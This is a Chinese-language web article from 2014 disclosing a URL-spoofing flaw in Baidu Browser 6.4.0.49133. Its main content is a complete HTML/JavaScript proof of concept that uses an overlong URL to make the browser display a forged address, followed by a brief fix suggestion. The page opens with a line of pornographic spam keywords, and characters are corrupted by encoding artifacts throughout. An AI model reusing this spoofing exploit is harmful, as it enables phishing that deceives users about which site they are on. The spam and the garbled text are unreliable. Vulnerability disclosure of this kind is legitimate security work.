欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

瀏覽器漏洞 百度瀏覽器6.4.0.49133 偽造任意網(wǎng)址

  發(fā)布時(shí)間:2014-09-25 16:01:22   作者:佚名   我要評(píng)論
百度瀏覽器近期發(fā)現(xiàn)漏洞,百度瀏覽器6.4.0.49133 一旦域名、網(wǎng)址URL長(zhǎng)度大于4KB時(shí)處理出錯(cuò),例如將證明文件保存為c:\a.htm并打開(kāi),點(diǎn)擊連接后可以偽造任意網(wǎng),需要的朋友可以參考下

  百度瀏覽器近期發(fā)現(xiàn)漏洞,百度瀏覽器6.4.0.49133以及以前版本偽造任意網(wǎng)址漏洞,偽造任意協(xié)議(http/https/ftp...)、域名、網(wǎng)址URL長(zhǎng)度大于4KB時(shí)處理出錯(cuò),例如將證明文件保存為c:\a.htm并打開(kāi),點(diǎn)擊連接后可以偽造任意網(wǎng)址。

  同時(shí)URL過(guò)長(zhǎng)的時(shí)候,會(huì)顯示“已收藏”圖標(biāo),估計(jì)是處理過(guò)長(zhǎng)url時(shí)邏輯有點(diǎn)小問(wèn)題漏洞證明:


復(fù)制代碼
代碼如下:
  <html>
  <div id='c' style=''> //displaynone
  ss
  </div>
  <a href="#" target="newwin" id='v' style="display:block" onclick="invokePoC();window.open('javascript:1;','newwin');">just click me</a>
  <script>
  function invokePoC() {
  wx = open("http://www.baidu.com/account/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</p> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
","newwin");//setInterval("doit()",5000);
  }
  if(window.name == "newwin")
  {
  document.getElementById('c').innerText = ':). due to an internal error(>10Kbytes url), the fav icon will be shown. if you just want the shortest url, just make it for about 4KB';document.write("<title>:)</title>");
  document.getElementById('v').style.display = 'none';}
  </script>
  </html>

  修復(fù)方案:

  無(wú)效URL及時(shí)過(guò)濾,以防止偽造網(wǎng)址,謝謝閱讀,希望能幫到大家,請(qǐng)繼續(xù)關(guān)注腳本之家,我們會(huì)努力分享更多優(yōu)秀的文章。

相關(guān)文章

最新評(píng)論